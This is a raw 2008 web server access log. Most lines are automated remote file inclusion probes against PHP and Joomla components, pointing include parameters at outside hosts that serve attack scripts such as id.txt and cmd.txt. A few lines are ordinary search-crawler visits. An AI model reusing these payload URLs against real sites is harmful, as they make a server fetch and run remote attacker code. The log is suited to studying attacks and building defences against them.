77.221.130.3 - - [07/Apr/2008:11:01:36 -0700] "GET /logs/access_071229.log//components/com_simpleboard/image_upload.php?sbp=http://www.hddshare.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.3 - - [07/Apr/2008:11:01:37 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.hddshare.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.3 - - [07/Apr/2008:11:01:42 -0700] "GET /logs/access_080117.log//components/com_simpleboard/image_upload.php?sbp=http://www.hddshare.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.23.172.8 - - [07/Apr/2008:11:01:51 -0700] "GET /logs/access_080130.log//init_basic.php?GALLERY_BASEDIR=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [07/Apr/2008:11:01:51 -0700] "GET /logs/access_080130.log//init_basic.php?GALLERY_BASEDIR=http://www.frilufts.se/malmo/tvm//pollphp/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [07/Apr/2008:11:01:51 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://www.frilufts.se/malmo/tvm//pollphp/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [07/Apr/2008:11:01:52 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [07/Apr/2008:11:01:52 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.frilufts.se/malmo/tvm//pollphp/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [07/Apr/2008:11:01:52 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [07/Apr/2008:11:01:52 -0700] "GET /logs/access_071229.log//init_basic.php?GALLERY_BASEDIR=http://www.frilufts.se/malmo/tvm//pollphp/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.23.172.8 - - [07/Apr/2008:11:01:52 -0700] "GET /logs/access_071229.log//init_basic.php?GALLERY_BASEDIR=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
82.208.87.163 - - [07/Apr/2008:11:02:04 -0700] "GET /logs/access_080216.log/main.php?x=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.208.87.163 - - [07/Apr/2008:11:02:04 -0700] "GET /main.php?x=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.208.87.163 - - [07/Apr/2008:11:02:05 -0700] "GET /logs/main.php?x=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.195.11.193 - - [07/Apr/2008:11:02:07 -0700] "GET /logs/access.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.Sindrom%60x%60.sufx.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.195.11.193 - - [07/Apr/2008:11:02:07 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.Sindrom%60x%60.sufx.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.195.11.193 - - [07/Apr/2008:11:02:08 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.Sindrom%60x%60.sufx.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.195.11.193 - - [07/Apr/2008:11:02:12 -0700] "GET /logs/access_080312.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.Sindrom%60x%60.sufx.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.149.195.18 - - [07/Apr/2008:11:02:18 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://contactcraze.com/tanii.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.208.87.163 - - [07/Apr/2008:11:02:19 -0700] "GET /logs/access_080216.log/main.php?x=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.208.87.163 - - [07/Apr/2008:11:02:19 -0700] "GET /main.php?x=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.208.87.163 - - [07/Apr/2008:11:02:20 -0700] "GET /logs/main.php?x=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
58.26.137.64 - - [07/Apr/2008:11:02:59 -0700] "GET /%3Cstring%3Ehttp://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
61.67.120.48 - - [07/Apr/2008:11:03:00 -0700] "GET /logs/access_080329.log//index.php?option=com_custompages&cpage=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.26.137.64 - - [07/Apr/2008:11:03:01 -0700] "GET /logs/%3Cstring%3Ehttp://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
80.65.76.195 - - [07/Apr/2008:11:03:01 -0700] "GET /logs/access_080128.log//skins/advanced/advanced1.php?pluginpath[0]=http://scanbax.we.bs/cmd.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.65.76.195 - - [07/Apr/2008:11:03:02 -0700] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://scanbax.we.bs/cmd.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
60.249.42.221 - - [07/Apr/2008:11:03:02 -0700] "GET //index.php?option=com_custompages&cpage=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 200 7371 "-" "libwww-perl/5.79" "www.dmulk.com"
80.65.76.195 - - [07/Apr/2008:11:03:02 -0700] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://scanbax.we.bs/cmd.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
60.249.42.221 - - [07/Apr/2008:11:03:03 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.11.238.233 - - [07/Apr/2008:11:03:06 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.11.238.233 - - [07/Apr/2008:11:03:06 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.11.238.233 - - [07/Apr/2008:11:03:06 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.219.253.173 - - [07/Apr/2008:11:03:09 -0700] "GET /logs/access_080105.log/index.php?incl=http://scanbax.we.bs/cmd.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.47" "www.dmulk.com"
216.219.253.173 - - [07/Apr/2008:11:03:11 -0700] "GET /index.php?incl=http://scanbax.we.bs/cmd.txt????? HTTP/1.0" 200 7355 "-" "libwww-perl/5.47" "www.dmulk.com"
216.219.253.173 - - [07/Apr/2008:11:03:11 -0700] "GET /logs/index.php?incl=http://scanbax.we.bs/cmd.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.47" "www.dmulk.com"
216.219.253.173 - - [07/Apr/2008:11:03:28 -0700] "GET /logs/access_080212.log/index.php?incl=http://scanbax.we.bs/cmd.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.47" "www.dmulk.com"
69.90.114.126 - - [07/Apr/2008:11:03:48 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.buyindianproducts.com/includes/font/idrac2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.90.114.126 - - [07/Apr/2008:11:03:50 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.buyindianproducts.com/includes/font/idrac2.txt?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.803" "www.dmulk.com"
69.90.114.126 - - [07/Apr/2008:11:03:50 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.buyindianproducts.com/includes/font/idrac2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.55.232.28 - - [07/Apr/2008:11:03:55 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.232.28 - - [07/Apr/2008:11:03:55 -0700] "GET /funny/?M=A HTTP/1.1" 200 808 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
80.65.76.195 - - [07/Apr/2008:11:04:15 -0700] "GET /logs/access_080131.log//skins/advanced/advanced1.php?pluginpath[0]=http://scanbax.we.bs/cmd.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.220.207.62 - - [07/Apr/2008:11:04:47 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.111.204.40 - - [07/Apr/2008:11:05:10 -0700] "GET /index.php?body=http://www.antares.net/borda2.jpg? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.232.28 - - [07/Apr/2008:11:05:25 -0700] "GET /funny/?S=A HTTP/1.1" 200 808 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.232.28 - - [07/Apr/2008:11:05:25 -0700] "GET /funny/?D=A HTTP/1.1" 200 808 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.232.28 - - [07/Apr/2008:11:05:27 -0700] "GET /minamijewelry/?N=D HTTP/1.1" 200 2110 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
74.6.8.93 - - [07/Apr/2008:11:05:29 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.11.253 - - [07/Apr/2008:11:05:30 -0700] "GET /minamijewelry/source_images/?D=A HTTP/1.0" 200 2398 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
79.30.170.102 - - [07/Apr/2008:11:05:37 -0700] "GET /logs/access.log/modules/4nAlbum/public/displayCategory.php?basepath=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.220.207.62 - - [07/Apr/2008:11:05:46 -0700] "GET //index.php?option=com_custompages&cpage=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 200 7371 "-" "libwww-perl/5.808" "www.dmulk.com"
81.208.83.232 - - [07/Apr/2008:11:06:08 -0700] "GET /logs/access_071229.log/modules/vwar/admin/admin.php?vwar_root=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.208.83.232 - - [07/Apr/2008:11:06:09 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.208.83.232 - - [07/Apr/2008:11:06:10 -0700] "GET /logs/modules/vwar/admin/admin.php?vwar_root=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
60.249.45.142 - - [07/Apr/2008:11:06:12 -0700] "GET //index.php?option=com_custompages&cpage=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 200 7371 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.37.167 - - [07/Apr/2008:11:06:16 -0700] "GET /logs/access_070704.log HTTP/1.0" 200 11515 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.37.167 - - [07/Apr/2008:11:06:17 -0700] "GET /logs/access_070719.log HTTP/1.0" 200 50682 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:11:06:56 -0700] "GET /logs/access_080118.log//components/com_simpleboard/image_upload.php?sbp=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:11:06:57 -0700] "GET /logs/access_080118.log//components/com_simpleboard/image_upload.php?sbp=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.208.83.232 - - [07/Apr/2008:11:07:10 -0700] "GET /logs/access_080211.log/modules/vwar/admin/admin.php?vwar_root=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.205.115 - - [07/Apr/2008:11:07:38 -0700] "GET /logs/access_080124.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.205.115 - - [07/Apr/2008:11:07:39 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.205.115 - - [07/Apr/2008:11:07:39 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.191.19.109 - - [07/Apr/2008:11:08:19 -0700] "GET /encapscms_PATH/core/core.php?root=http://www.vivexperiencia.pt/site/cache/.log/test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
88.191.19.109 - - [07/Apr/2008:11:08:19 -0700] "GET /logs/encapscms_PATH/core/core.php?root=http://www.vivexperiencia.pt/site/cache/.log/test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
213.221.88.99 - - [07/Apr/2008:11:08:21 -0700] "GET /logs/cyberfolio/portfolio/msg/view.php?av=http://www.vivexperiencia.pt/site/cache/.log/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
12.192.82.221 - - [07/Apr/2008:11:08:39 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.antares.net/borda2.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.30.216.102 - - [07/Apr/2008:11:09:44 -0700] "GET /logs/access_080117.log HTTP/1.0" 200 655360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
70.86.95.82 - - [07/Apr/2008:11:09:46 -0700] "GET //main.php?sayfa=http://www.antares.net/borda2.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.22.45 - - [07/Apr/2008:11:10:05 -0700] "GET /minamijewelry/source_images/?D=D HTTP/1.0" 200 2398 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.72.221.90 - - [07/Apr/2008:11:10:07 -0700] "GET /logs/access_080329.log/index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://phanservice.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.221.90 - - [07/Apr/2008:11:10:08 -0700] "GET /logs/index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://phanservice.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.221.90 - - [07/Apr/2008:11:10:32 -0700] "GET /logs/access_080226.log/index.php?mosConfig_absolute_path=http://phanservice.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.221.90 - - [07/Apr/2008:11:10:34 -0700] "GET /index.php?mosConfig_absolute_path=http://phanservice.com/id.txt? HTTP/1.1" 200 7371 "-" "libwww-perl/5.808" "www.dmulk.com"
91.121.10.188 - - [07/Apr/2008:11:10:34 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.antares.net/borda2.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.72.221.90 - - [07/Apr/2008:11:10:37 -0700] "GET /logs/index.php?mosConfig_absolute_path=http://phanservice.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
118.127.2.108 - - [07/Apr/2008:11:10:52 -0700] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.firerunners.nl//test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
118.127.2.108 - - [07/Apr/2008:11:10:52 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.firerunners.nl//test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
60.249.42.221 - - [07/Apr/2008:11:11:10 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.50.208 - - [07/Apr/2008:11:11:29 -0700] "GET /logs/access_080312.log/admin/index.php?o=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.50.208 - - [07/Apr/2008:11:11:29 -0700] "GET /admin/index.php?o=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.50.208 - - [07/Apr/2008:11:11:30 -0700] "GET /logs/admin/index.php?o=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.72.172.10 - - [07/Apr/2008:11:11:46 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://nad.nad.hostagig.com/.../data/456.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.172.10 - - [07/Apr/2008:11:11:47 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://nad.nad.hostagig.com/.../data/456.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.172.10 - - [07/Apr/2008:11:11:47 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://nad.nad.hostagig.com/.../data/456.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.90.114.126 - - [07/Apr/2008:11:11:52 -0700] "GET /logs/access.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.90.114.126 - - [07/Apr/2008:11:11:52 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.90.114.126 - - [07/Apr/2008:11:11:52 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.90.114.126 - - [07/Apr/2008:11:11:53 -0700] "GET /logs/access_080312.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.30.216.94 - - [07/Apr/2008:11:11:55 -0700] "GET /logs/access_080207.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
204.11.238.233 - - [07/Apr/2008:11:12:14 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.172.10 - - [07/Apr/2008:11:12:17 -0700] "GET /logs/access_080108.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://nad.nad.hostagig.com/.../data/456.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.26.88 - - [07/Apr/2008:11:12:42 -0700] "GET /logs/access_080221.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.230.71.1 - - [07/Apr/2008:11:12:47 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://boxstr.com/files/1311840_mm1dt/id.txt?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
66.193.60.15 - - [07/Apr/2008:11:13:02 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://odyrt.net/info/templates/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.90.114.126 - - [07/Apr/2008:11:13:20 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.buyindianproducts.com/includes/font/idrac2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.74.65.15 - - [07/Apr/2008:11:14:19 -0700] "GET /logs/access_080124.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.74.65.15 - - [07/Apr/2008:11:14:20 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.212.1.227 - - [07/Apr/2008:11:14:46 -0700] "GET /logs/access_080329.log//components/com_simpleboard/image_upload.php?sbp=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.212.1.227 - - [07/Apr/2008:11:14:47 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.50.53.151 - - [07/Apr/2008:11:15:13 -0700] "GET /logs/access.log/administrator/?mosConfig_absolute_path=http://www.dzipas.lt/auto-skelbimai/admin/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.50.53.151 - - [07/Apr/2008:11:15:14 -0700] "GET /administrator/?mosConfig_absolute_path=http://www.dzipas.lt/auto-skelbimai/admin/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.50.53.151 - - [07/Apr/2008:11:15:14 -0700] "GET /logs/administrator/?mosConfig_absolute_path=http://www.dzipas.lt/auto-skelbimai/admin/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.74.65.15 - - [07/Apr/2008:11:15:20 -0700] "GET /logs/access_080215.log/index.php?x=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.74.65.15 - - [07/Apr/2008:11:15:22 -0700] "GET /index.php?x=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.803" "www.dmulk.com"
195.74.65.15 - - [07/Apr/2008:11:15:23 -0700] "GET /logs/index.php?x=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.50.53.151 - - [07/Apr/2008:11:15:32 -0700] "GET /logs/access.log/administrator/?mosConfig_absolute_path=http://www.dzipas.lt/auto-skelbimai/admin/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.50.53.151 - - [07/Apr/2008:11:15:32 -0700] "GET /administrator/?mosConfig_absolute_path=http://www.dzipas.lt/auto-skelbimai/admin/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.50.53.151 - - [07/Apr/2008:11:15:33 -0700] "GET /logs/administrator/?mosConfig_absolute_path=http://www.dzipas.lt/auto-skelbimai/admin/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.30.170.102 - - [07/Apr/2008:11:15:41 -0700] "GET /logs/access_080207.log/modules/4nAlbum/public/displayCategory.php?basepath=http://mcleanmkting.com/catalog/images/default/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.65.76.195 - - [07/Apr/2008:11:16:06 -0700] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://scanbax.we.bs/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.185.193.90 - - [07/Apr/2008:11:16:20 -0700] "GET /logs/access_080106.log//admin.php?include_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.185.193.90 - - [07/Apr/2008:11:16:20 -0700] "GET /logs/access_080106.log//admin.php?include_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.185.193.90 - - [07/Apr/2008:11:16:21 -0700] "GET //admin.php?include_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.185.193.90 - - [07/Apr/2008:11:16:21 -0700] "GET //admin.php?include_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.185.193.90 - - [07/Apr/2008:11:16:21 -0700] "GET /logs//admin.php?include_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
